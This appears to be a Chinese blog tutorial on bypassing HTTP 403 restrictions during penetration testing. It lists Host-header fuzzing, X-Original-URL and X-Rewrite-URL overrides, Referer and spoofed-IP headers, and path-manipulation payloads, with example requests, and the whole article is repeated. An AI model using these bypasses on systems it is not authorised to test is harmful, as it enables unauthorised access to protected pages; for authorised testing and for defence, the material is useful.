渗透测试如何利用403页面
0x01 前言
做渗透时经常会碰到扫到的资产403的情况,特别是资产微乎其微的情况下,面试有时也会问到,这里做个总结!
0x02 利用姿势
1.端口利用
扫描主机端口,找其它开放web服务的端口,访问其端口,挑软柿子。
2.修改host
host在请求头中的作用:在一般情况下,几个网站可能会部署在同一个服务器上,或者几个web系统共享一个服务器,通过host头来指定应该由哪个网站或者web系统来处理用户的请求。而很多web应用通过获取http host头来获得当前请求访问的位置,但是很多开发人员并未意识到http host头由用户控制,从安全角度来讲,任何用户输入都是认为不安全的。
修改客户端请求头中的host可以通过修改host值修改为子域名或者ip来绕过来进行绕过二级域名;首先对该目标域名进行子域名收集,整理好子域名资产(host字段同样支持ip地址)。先fuzz测试跑一遍收集到的子域名,这里使用的是burp的intruder功能。若看到一个服务端返回200的状态码,即表面成功找到一个在host白名单中的子域名。我们利用firefox插件来修改host值,成功绕过访问限制。
3.覆盖请求url
尝试使用x-original-url和x-rewrite-url标头绕过web服务器的限制。通过支持x-original-url和x-rewrite-url标头,用户可以使用这俩请求标头覆盖请求url中的路径,尝试绕过对更高级别的缓存和web服务器的限制
requestget /auth/login http/1.1responsehttp/1.1 403 forbiddenreqeustget / http/1.1x-original-url: /auth/loginresponsehttp/1.1 200 ok或者:reqeustget / http/1.1x-rewrite-url: /auth/loginresponsehttp/1.1 200 ok
4.referer标头绕过
尝试使用referer标头绕过web服务器的限制。
介绍:referer请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用referer请求头识别访问来源。
requestget /auth/login http/1.1host: xxxresponsehttp/1.1 403 forbiddenreqeustget / http/1.1host: xxxreferer//xxx/auth/loginresponsehttp/1.1 200 ok或者reqeustget /auth/login http/1.1host: xxxreferer//xxx/auth/loginresponsehttp/1.1 200 ok
5.代理ip
一般开发者会通过nginx代理识别访问端ip限制对接口的访问,尝试使用x-forwarded-for、x-forwared-host等标头绕过web服务器的限制。
x-originating-ip: 127.0.0.1x-remote-ip: 127.0.0.1x-client-ip: 127.0.0.1x-forwarded-for: 127.0.0.1x-forwared-host: 127.0.0.1x-host: 127.0.0.1x-custom-ip-authorization: 127.0.0.1如:requestget /auth/login http/1.1responsehttp/1.1 401 unauthorizedreqeustget /auth/login http/1.1x-custom-ip-authorization: 127.0.0.1responsehttp/1.1 200 ok
6.扩展名绕过
基于扩展名,用于绕过403受限制的目录。
site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin/* => 200 site.com/admin/*/ => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin => 200 site.com/admin? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200
7.扫描的时候 遇到403了,上目录扫描工具,扫目录,扫文件(记住,扫描的时候要打开探测403,因为有些网站的目录没有权限访问会显示403,但是在这个目录下面的文件,我们或许能扫描到并访问 )
小米研发SoC到底是何目的?与老牌玩家华为、高通的差距!
花样百出的XR技术!XR虚拟拍摄在不同行业的运用
华为正准备通过Nova 8系列扩展其Nova系列
光电式转速传感器
智能设备无线充电的几大技术路径介绍
渗透测试如何利用403页面
功能原型系统:算法工程开发常见问题及图形化解决的优点介绍
医用手套不透水性测试仪的特征及参数
中消云和中国电信、华为合作,助力NB-IoT智慧消防大规模商用
小米MIX3和一加6T哪个拍照最好
GRA24200D-25MA-U1双电压输出高压电源模块/DC-DC升压变换器
面向汽车电子乘用车电气化的电池管理系统
ABB PLC远程控制,实现远程上下载,远程监控功能
在微信支付公布“纵”“横”战略之后,其意义何在呢?
LabVIEW开放神经网络交互工具包【ONNX】,大幅降低人工智能开发门槛,实现飞速推理
GT ASF材料能够实现最高的LED晶圆产量
用于安全关键应用的双AMR电机位置传感器
什么是霍耳器件?
以创新技术驱动万物智联,“Tuya Developer Day”引航CES 2024新潮流
屏蔽网线和非屏蔽网线如何进行选择呢
做渗透时经常会碰到扫到的资产403的情况,特别是资产微乎其微的情况下,面试有时也会问到,这里做个总结!
0x02 利用姿势
1.端口利用
扫描主机端口,找其它开放web服务的端口,访问其端口,挑软柿子。
2.修改host
host在请求头中的作用:在一般情况下,几个网站可能会部署在同一个服务器上,或者几个web系统共享一个服务器,通过host头来指定应该由哪个网站或者web系统来处理用户的请求。而很多web应用通过获取http host头来获得当前请求访问的位置,但是很多开发人员并未意识到http host头由用户控制,从安全角度来讲,任何用户输入都是认为不安全的。
修改客户端请求头中的host可以通过修改host值修改为子域名或者ip来绕过来进行绕过二级域名;首先对该目标域名进行子域名收集,整理好子域名资产(host字段同样支持ip地址)。先fuzz测试跑一遍收集到的子域名,这里使用的是burp的intruder功能。若看到一个服务端返回200的状态码,即表面成功找到一个在host白名单中的子域名。我们利用firefox插件来修改host值,成功绕过访问限制。
3.覆盖请求url
尝试使用x-original-url和x-rewrite-url标头绕过web服务器的限制。通过支持x-original-url和x-rewrite-url标头,用户可以使用这俩请求标头覆盖请求url中的路径,尝试绕过对更高级别的缓存和web服务器的限制
requestget /auth/login http/1.1responsehttp/1.1 403 forbiddenreqeustget / http/1.1x-original-url: /auth/loginresponsehttp/1.1 200 ok或者:reqeustget / http/1.1x-rewrite-url: /auth/loginresponsehttp/1.1 200 ok
4.referer标头绕过
尝试使用referer标头绕过web服务器的限制。
介绍:referer请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用referer请求头识别访问来源。
requestget /auth/login http/1.1host: xxxresponsehttp/1.1 403 forbiddenreqeustget / http/1.1host: xxxreferer//xxx/auth/loginresponsehttp/1.1 200 ok或者reqeustget /auth/login http/1.1host: xxxreferer//xxx/auth/loginresponsehttp/1.1 200 ok
5.代理ip
一般开发者会通过nginx代理识别访问端ip限制对接口的访问,尝试使用x-forwarded-for、x-forwared-host等标头绕过web服务器的限制。
x-originating-ip: 127.0.0.1x-remote-ip: 127.0.0.1x-client-ip: 127.0.0.1x-forwarded-for: 127.0.0.1x-forwared-host: 127.0.0.1x-host: 127.0.0.1x-custom-ip-authorization: 127.0.0.1如:requestget /auth/login http/1.1responsehttp/1.1 401 unauthorizedreqeustget /auth/login http/1.1x-custom-ip-authorization: 127.0.0.1responsehttp/1.1 200 ok
6.扩展名绕过
基于扩展名,用于绕过403受限制的目录。
site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin/* => 200 site.com/admin/*/ => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin => 200 site.com/admin? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200
7.扫描的时候 遇到403了,上目录扫描工具,扫目录,扫文件(记住,扫描的时候要打开探测403,因为有些网站的目录没有权限访问会显示403,但是在这个目录下面的文件,我们或许能扫描到并访问 )
小米研发SoC到底是何目的?与老牌玩家华为、高通的差距!
花样百出的XR技术!XR虚拟拍摄在不同行业的运用
华为正准备通过Nova 8系列扩展其Nova系列
光电式转速传感器
智能设备无线充电的几大技术路径介绍
渗透测试如何利用403页面
功能原型系统:算法工程开发常见问题及图形化解决的优点介绍
医用手套不透水性测试仪的特征及参数
中消云和中国电信、华为合作,助力NB-IoT智慧消防大规模商用
小米MIX3和一加6T哪个拍照最好
GRA24200D-25MA-U1双电压输出高压电源模块/DC-DC升压变换器
面向汽车电子乘用车电气化的电池管理系统
ABB PLC远程控制,实现远程上下载,远程监控功能
在微信支付公布“纵”“横”战略之后,其意义何在呢?
LabVIEW开放神经网络交互工具包【ONNX】,大幅降低人工智能开发门槛,实现飞速推理
GT ASF材料能够实现最高的LED晶圆产量
用于安全关键应用的双AMR电机位置传感器
什么是霍耳器件?
以创新技术驱动万物智联,“Tuya Developer Day”引航CES 2024新潮流
屏蔽网线和非屏蔽网线如何进行选择呢